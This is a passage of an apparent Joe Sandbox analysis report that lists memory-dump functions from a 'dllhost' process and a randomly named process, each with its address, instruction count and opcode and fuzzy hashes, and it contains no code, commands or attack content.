                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cc423bc7c1a8d654af294ca185d0fcf79e4318a47ad70c760eac9e0a9b3387ee
                                                            • Instruction ID: 0a8d8000c5229325308f63bf0421beb0d93bfda64aba3346cc60191f834ef825
                                                            • Opcode Fuzzy Hash: cc423bc7c1a8d654af294ca185d0fcf79e4318a47ad70c760eac9e0a9b3387ee
                                                            • Instruction Fuzzy Hash: 12113631B1DB8D1FD785EB2884641A97FE0EF99260F0105BBE04DC71A2DE2999468341
                                                            Function 00007FFD9B9F09E0 Relevance: .1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d5a98a822ae75bb7c57801db77b7d08d2958a5cc356046cc4e270307d2499b1d
                                                            • Instruction ID: d51a44799f1cc8ff86cf877a8182ede82dff81ca34a1b978baa51a5ae6220bdc
                                                            • Opcode Fuzzy Hash: d5a98a822ae75bb7c57801db77b7d08d2958a5cc356046cc4e270307d2499b1d
                                                            • Instruction Fuzzy Hash: A101DD12B2ED0F1AE2B46F9C14696B61BC9DFD4A30B53017A940DC2196DC15ED464380
                                                            Function 00007FFD9B9F0E39 Relevance: .1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 99268f7b6a9f3ee25ecd630826417316266d93dc326106c858ee54a94433c6db
                                                            • Instruction ID: 4f786c11c39c3d6754f4461714125b2fa94931da5b24f5b4c706856affe2cc98
                                                            • Opcode Fuzzy Hash: 99268f7b6a9f3ee25ecd630826417316266d93dc326106c858ee54a94433c6db
                                                            • Instruction Fuzzy Hash: 5C010820B0A6C80FD347A77898A9AB47FD1AF87225B1941F6E08CCB0B3C9584D46C342
                                                            Function 00007FFD9B9F4064 Relevance: .0, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9ec61cd257a3697a3508f92bf29b821005138987e9b708df97b1c7ac58450ccd
                                                            • Instruction ID: 308c6ad0a7ee96a0a341d60fd12767887fb93fb372f55d266e15a92f3d87b1fc
                                                            • Opcode Fuzzy Hash: 9ec61cd257a3697a3508f92bf29b821005138987e9b708df97b1c7ac58450ccd
                                                            • Instruction Fuzzy Hash: EBF02852F1A80E1FEFA4AA6D18A63FC7BD1EF99230B69007ED11DC32A6DC182D064341
                                                            Function 00007FFD9B9F4F11 Relevance: .0, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 99486e774a56f52803bef55a5d8599f9b22862591aa97fb29163bd4109f6efe8
                                                            • Instruction ID: 63839d321fcd7119f8c45ff6711cce64221ad4c08c342bf1831b445128560559
                                                            • Opcode Fuzzy Hash: 99486e774a56f52803bef55a5d8599f9b22862591aa97fb29163bd4109f6efe8
                                                            • Instruction Fuzzy Hash: 77014920B1E1860BE32923B845303F82F519F81364F4701F9D45DCA2F7CD5D1E928352
                                                            Function 00007FFD9B9F0DF6 Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3d8fc19d0285d2e22805ee2b7b4ff4fded4189380761619f7ed988b0715adae
                                                            • Instruction ID: 66354d06e93951ddd6ffbef4c05684633fe50cf42cef242b75d57588d9eed6b1
                                                            • Opcode Fuzzy Hash: a3d8fc19d0285d2e22805ee2b7b4ff4fded4189380761619f7ed988b0715adae
                                                            • Instruction Fuzzy Hash: AEE02B7290E64C2EEB08AA59FC17CF67F98DAC7334B00005FF19DC2163E11269638295
                                                            Function 00007FFD9B9F4D65 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cba3395293f495df42aa0f25d50b8e6e731717abc89634109390398183909b78
                                                            • Instruction ID: b4a3797a875c0ed72d3e7f3890eb4ca61799d6b9a0fa75ffb4b413ca56b5165d
                                                            • Opcode Fuzzy Hash: cba3395293f495df42aa0f25d50b8e6e731717abc89634109390398183909b78
                                                            • Instruction Fuzzy Hash: FBE0D83295990D8BEB54AA995C242D93BE4FB49308F010169E05CC7291D7356A55C345
                                                            Function 00007FFD9B9F4EF0 Relevance: .0, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9a7b99d26aacc37c9e1f9d5444bfda77bcc91dd4cba883571b85b82cd944b485
                                                            • Instruction ID: 097487ed3a1308f5bd0aa4b912b04fa21d611db8c3deedaa84166050100f0331
                                                            • Opcode Fuzzy Hash: 9a7b99d26aacc37c9e1f9d5444bfda77bcc91dd4cba883571b85b82cd944b485
                                                            • Instruction Fuzzy Hash: C8D0C99295F3C54FCB0352B51C391907FA06E0342078E41EBC8D4DB2E3E08E19498322
                                                            Function 00007FFD9B9F0CC0 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1906031343.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_7ffd9b9f0000_dllhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f485d9905aad31deaea95b36770a9dd7a202213e7a41e57da4928a232dc4ce51
                                                            • Instruction ID: 77eb57825d8557362d696eacd50ebbdcf49590f7d6a6d6e2adf0ab05fc602a8c
                                                            • Opcode Fuzzy Hash: f485d9905aad31deaea95b36770a9dd7a202213e7a41e57da4928a232dc4ce51
                                                            • Instruction Fuzzy Hash: 31C02B13B8AD0F098B047358B880CE1F380C7501303400AB3C80BC104CDC1B98C14340

                                                            Executed Functions

                                                            Function 00007FFD9BA11222 Relevance: .4, Instructions: 391COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1901397288.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9ba10000_EbnrVuXczrPqjyiJGoZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4163e4d044f596616861a15f0bfef9621ca863d2bd5b19eb9d33b47a6cc14d6c
                                                            • Instruction ID: 03666d989f622eb57151a1a9d8936d815bce82c86ad334430a68c3e65e594072
                                                            • Opcode Fuzzy Hash: 4163e4d044f596616861a15f0bfef9621ca863d2bd5b19eb9d33b47a6cc14d6c
                                                            • Instruction Fuzzy Hash: 37C18B20B1E68E0FE7A99B7884652B53BD1EFA6310F0640BED48EC71E7DD5DA842C341
                                                            Function 00007FFD9BA1276D Relevance: .7, Instructions: 681COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1901397288.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9ba10000_EbnrVuXczrPqjyiJGoZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5606e90c50e29e747e99c8010d0119df8362f7cb4e5b62384928747107fb43c2
                                                            • Instruction ID: abd6a9316a611d8b1a23fe5ff3aa6e9b7f361e9728539ffc0561682b9118859c
                                                            • Opcode Fuzzy Hash: 5606e90c50e29e747e99c8010d0119df8362f7cb4e5b62384928747107fb43c2
                                                            • Instruction Fuzzy Hash: 16323531B0D78E4FE7B5ABA888216B877D1EF41318F0600B9D44D871E7DE6DAD0A8791
                                                            Function 00007FFD9BA148F1 Relevance: .5, Instructions: 497COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1901397288.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9ba10000_EbnrVuXczrPqjyiJGoZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5a5f8c92284d8009b196d163216c7d5ea11fd234ae1fabed49bfebdcb495fe4b
                                                            • Instruction ID: 977a9d5aa9bd4cfa7ec5f0d70ed6f3d97f141ca7e224d29f1ada1504b8616c77
                                                            • Opcode Fuzzy Hash: 5a5f8c92284d8009b196d163216c7d5ea11fd234ae1fabed49bfebdcb495fe4b
                                                            • Instruction Fuzzy Hash: 17F1F560B1EA4E4FEBF4EB9C84E56793BE1EF95300B56507DC04DC31B2DDA86A418B81
                                                            Function 00007FFD9BA134AF Relevance: .5, Instructions: 490COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1901397288.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9ba10000_EbnrVuXczrPqjyiJGoZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a8fb08aeb4c34af067f6364afcac8273a5b4df77c4c2e90b8732d91c0ac7c493
                                                            • Instruction ID: 0cf147acc1fb24f3eea0d859e6588562e8a1861453ce1967c82444a5534492c0
                                                            • Opcode Fuzzy Hash: a8fb08aeb4c34af067f6364afcac8273a5b4df77c4c2e90b8732d91c0ac7c493
                                                            • Instruction Fuzzy Hash: 10E13622B0991E5EEB54FBBCE8A5AECBBA0EF44321F1002BBD05DC7197CE2568458751
                                                            Function 00007FFD9BA134D3 Relevance: .5, Instructions: 468COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1901397288.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9ba10000_EbnrVuXczrPqjyiJGoZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 447aa4055bddb22590b7d0f8a65382df62e79ea6c6a6d6abc07ca66f50ba5654
                                                            • Instruction ID: 0cdfdb8ff03d05ac90e0ba02b536f4265455eaed7348f9607fc5d91b718aa0e1
                                                            • Opcode Fuzzy Hash: 447aa4055bddb22590b7d0f8a65382df62e79ea6c6a6d6abc07ca66f50ba5654
                                                            • Instruction Fuzzy Hash: 57D10522B0991E5EEB54FBBCE865AECB7A0EF85321F0002BBD05DC7197CE2568458751
                                                            Function 00007FFD9BA135D3 Relevance: .4, Instructions: 357COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1901397288.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9ba10000_EbnrVuXczrPqjyiJGoZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6a0ada365aca29423b09e88fefbdf8c4613f21d591076939e1676ab1427bb8ab
                                                            • Instruction ID: 61e7031f670fd274c0c0064db3e28c5413bdb10f292d57574ff074831815402f
                                                            • Opcode Fuzzy Hash: 6a0ada365aca29423b09e88fefbdf8c4613f21d591076939e1676ab1427bb8ab
                                                            • Instruction Fuzzy Hash: F3B1E222B0991D4EEB94FFACEC65AEDBBA0FF84311F0002BBD01DD7196CE2568458B51
                                                            Function 00007FFD9BA12640 Relevance: .3, Instructions: 331COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1901397288.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9ba10000_EbnrVuXczrPqjyiJGoZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 54ba27b41a0c861a34965566f3e8e56b59149f6f45f25ced37faae1020937cf8
                                                            • Instruction ID: 3d6cf38edd3d2f9a15af3281ab4987d70ed2aeae730d8efcb1228a75c3a5d10f
                                                            • Opcode Fuzzy Hash: 54ba27b41a0c861a34965566f3e8e56b59149f6f45f25ced37faae1020937cf8
                                                            • Instruction Fuzzy Hash: 8DB11431B0DA4A4FE7A4EBA888646B67792EF85314F1540B9D01EC72D7CE29EC46C780
                                                            Function 00007FFD9BA10EB5 Relevance: .3, Instructions: 285COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1901397288.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9ba10000_EbnrVuXczrPqjyiJGoZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eb6a957614af2f6796d07a2fe5e87a8b736715ef7a31107e634aadf4b9380e33
                                                            • Instruction ID: 992bf3e57ccbbe5e2b5bb424cebf68a2be5b9009d2135694df4cf3f0c99bb512
                                                            • Opcode Fuzzy Hash: eb6a957614af2f6796d07a2fe5e87a8b736715ef7a31107e634aadf4b9380e33
                                                            • Instruction Fuzzy Hash: 5E81D931F1994D4FDBE8EB6884666BCB7E2EF98710F4501BAD04ED32D6CE646C428740
                                                            Function 00007FFD9BA139E9 Relevance: .2, Instructions: 233COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1901397288.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9ba10000_EbnrVuXczrPqjyiJGoZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9dd24557b039faa799b8e8ec694930622beff01a744f648f394f1119f524e741
                                                            • Instruction ID: fa8b843c8cd7e478331fecf99d5045b942803104bae47c0ce1822270d22c4b54
                                                            • Opcode Fuzzy Hash: 9dd24557b039faa799b8e8ec694930622beff01a744f648f394f1119f524e741
                                                            • Instruction Fuzzy Hash: 6D811B70E0961D9FDB94EFA8C8A5AAD7BF1FF58304F1000BAD00DE7295DA74A9418B40
                                                            Function 00007FFD9BA10B85 Relevance: .1, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1901397288.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9ba10000_EbnrVuXczrPqjyiJGoZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4089d5bc249879b6479c3d0e032a3dd0f21316a63cdfcad2c87372fcf438fa91
                                                            • Instruction ID: 38330b12116ba70a562028abb69d5d97b7b77862a979f3c3186316ee2db3cc62
                                                            • Opcode Fuzzy Hash: 4089d5bc249879b6479c3d0e032a3dd0f21316a63cdfcad2c87372fcf438fa91
                                                            • Instruction Fuzzy Hash: 78411A2171D9494FD794FB7C84A5EB573D2EF98300B1641B6E41EC32E7CD29AD428341
                                                            Function 00007FFD9BA10CDA Relevance: .1, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1901397288.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9ba10000_EbnrVuXczrPqjyiJGoZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b090dfd71bb829ff87ac0cc50d07e78ee55524013bdb4e82452ce53cafa5216f
                                                            • Instruction ID: 5c68ca2684b9d93ec880240a22bd02ad55e961465d3e0c69b86ad4ef6df28761
                                                            • Opcode Fuzzy Hash: b090dfd71bb829ff87ac0cc50d07e78ee55524013bdb4e82452ce53cafa5216f
                                                            • Instruction Fuzzy Hash: 1F310B21B0DB490FE769A76C98167B97BD1EF99714F0001BEF44EC31C7CD6868028686
                                                            Function 00007FFD9BA150A9 Relevance: .1, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1901397288.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9ba10000_EbnrVuXczrPqjyiJGoZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ab8a81a45215a5f13baf6ce40e35030b305a5edd1f4653e0fd867138a9c75c65
                                                            • Instruction ID: 9c3597ddf53b8e9c55b6d4da4cf53a402142d6fe479e34f88cd87abf4e461330
                                                            • Opcode Fuzzy Hash: ab8a81a45215a5f13baf6ce40e35030b305a5edd1f4653e0fd867138a9c75c65
                                                            • Instruction Fuzzy Hash: A6310521B0EA4D0FDB96EB6848755B87BF1EF99200B0901FBD449D7297CD18AD048352
                                                            Function 00007FFD9BA10A76 Relevance: .1, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1901397288.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9ba10000_EbnrVuXczrPqjyiJGoZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 86d6085ebff73fb8a057f7648ca983e08d1da56c1920cfaa8a2084dc6cf3cf44
                                                            • Instruction ID: c3cf52815ee1c17e5b81ef1f7bc7445b91c8c2ca905aec941bd5a4425b4d0426
                                                            • Opcode Fuzzy Hash: 86d6085ebff73fb8a057f7648ca983e08d1da56c1920cfaa8a2084dc6cf3cf44
                                                            • Instruction Fuzzy Hash: 6031A631A0D51E8FEBA1EBB8C465AEDBBF0FF14300F0555B6D409E31A1DA78A985CB50
                                                            Function 00007FFD9BA12488 Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1901397288.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9ba10000_EbnrVuXczrPqjyiJGoZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01679bf7536c27ea9a16d68883db9aad5916b69eee592828af0e83a8e8debfbf
                                                            • Instruction ID: c85c1b3e10532b04604d82a5bba9e41632c738492e6a3912a7b8bf36bedf1a66
                                                            • Opcode Fuzzy Hash: 01679bf7536c27ea9a16d68883db9aad5916b69eee592828af0e83a8e8debfbf
                                                            • Instruction Fuzzy Hash: 1D214831F1880E0BEB94FBAC98656FD73E2EB98310F1401BBE81DD3285CD28A9014791
                                                            Function 00007FFD9BA109C1 Relevance: .1, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1901397288.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9ba10000_EbnrVuXczrPqjyiJGoZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: db2873602223e456c77e205e56374d729ed5f9eebd1e0a3c2351554661a2e761
                                                            • Instruction ID: 0012f9834b33b096f99c4b9b6bd08d97a28c76f568f1992f7a55b47bcb4d85ba
                                                            • Opcode Fuzzy Hash: db2873602223e456c77e205e56374d729ed5f9eebd1e0a3c2351554661a2e761
                                                            • Instruction Fuzzy Hash: CB11D512B0FE4F0FE7F8ABAC14756B636C1DFA5A10B0611BBD44DC21A7DD98AD064388
                                                            Function 00007FFD9BA14EB1 Relevance: .1, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1901397288.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9ba10000_EbnrVuXczrPqjyiJGoZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cc998a49b4e78b416be5f7f47eb529cf1d512e98f0f5be72f624c630f59e0d73
                                                            • Instruction ID: 9f71e64f51ddbafa5203bb9e0e877e1dae9e9ecfeb4624dbdbd098225668648c
                                                            • Opcode Fuzzy Hash: cc998a49b4e78b416be5f7f47eb529cf1d512e98f0f5be72f624c630f59e0d73
                                                            • Instruction Fuzzy Hash: 1C119D2194F2C91FD75297B46C265E17F74AF43211B0A01EBD488CB0F3C94D1A4AC762
                                                            Function 00007FFD9BA1089D Relevance: .1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1901397288.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9ba10000_EbnrVuXczrPqjyiJGoZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0c15d6527e5180a05a7743294ae529f497805d62b51c5195e6327e910a8a3a1a
                                                            • Instruction ID: cea01a2f6101fc8b4948c15cd10e6f24c50621e3bcbd09cb02ccb2f6157c74f9
                                                            • Opcode Fuzzy Hash: 0c15d6527e5180a05a7743294ae529f497805d62b51c5195e6327e910a8a3a1a
                                                            • Instruction Fuzzy Hash: 8311563160DB8D0FD7D5EB2884B05A97BE0EFA4360F01457FE04DC31A2DD69AA428341
                                                            Function 00007FFD9BA109E0 Relevance: .1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1901397288.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9ba10000_EbnrVuXczrPqjyiJGoZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f823bfc0bb3ec380752857928e3c33cdee2f726e1a2cbdf1c2946d63794d91b6
                                                            • Instruction ID: f891a833d66b930dc2358aaf14f8095ceae62e0273f8a818135fadbedb0c1470
                                                            • Opcode Fuzzy Hash: f823bfc0bb3ec380752857928e3c33cdee2f726e1a2cbdf1c2946d63794d91b6
                                                            • Instruction Fuzzy Hash: EC01FC12B0FD0F0BE2F87BAC14756B635C5DFE4A50B46117AE80DC219ADC99AD4643C4
                                                            Function 00007FFD9BA10E39 Relevance: .1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1901397288.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9ba10000_EbnrVuXczrPqjyiJGoZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 04b1672ca071e08737edaa50ce620e9e1556db24b7ef8a383f11a21156335c37
                                                            • Instruction ID: 79fc4a5004af6d5b9318b4a6b7d2ca6df58e39f978dedb1d28b2c3a483696e7d
                                                            • Opcode Fuzzy Hash: 04b1672ca071e08737edaa50ce620e9e1556db24b7ef8a383f11a21156335c37
                                                            • Instruction Fuzzy Hash: 4F01C820B0E6C94FD397E37898A96B47F91EF87215B1941F6E09CCB0B7D9984946C342
                                                            Function 00007FFD9BA14064 Relevance: .0, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1901397288.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9ba10000_EbnrVuXczrPqjyiJGoZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8a13e725a1d4eb83cceff742c5719fa64ba333c50c6286ac13c84b16b78ac9f7
                                                            • Instruction ID: cc73590f9e33194b62e59f77105b71136f34fbb426bb067e86dc015bf371ba6e
                                                            • Opcode Fuzzy Hash: 8a13e725a1d4eb83cceff742c5719fa64ba333c50c6286ac13c84b16b78ac9f7
                                                            • Instruction Fuzzy Hash: 6DF0F452F0A80E0FEBE4A76D14AA5B867D5EB99211B65207ED05DC31B6DC182D064741
                                                            Function 00007FFD9BA14F11 Relevance: .0, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1901397288.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9ba10000_EbnrVuXczrPqjyiJGoZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2d37aa131d7454ac4bbe572571e8a0c332e40b445833f5ccc15684495f2e0bdb
                                                            • Instruction ID: 7af41ef25d5aa5d060acca5a6ee013e6e98dba7a382e3c63048f2b86f354ee6d
                                                            • Opcode Fuzzy Hash: 2d37aa131d7454ac4bbe572571e8a0c332e40b445833f5ccc15684495f2e0bdb
                                                            • Instruction Fuzzy Hash: 38014920B0E18A0AE76923BC55703F827519F82314F0612FAD46DCE2F7CD9D19968391
                                                            Function 00007FFD9BA1518D Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1901397288.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
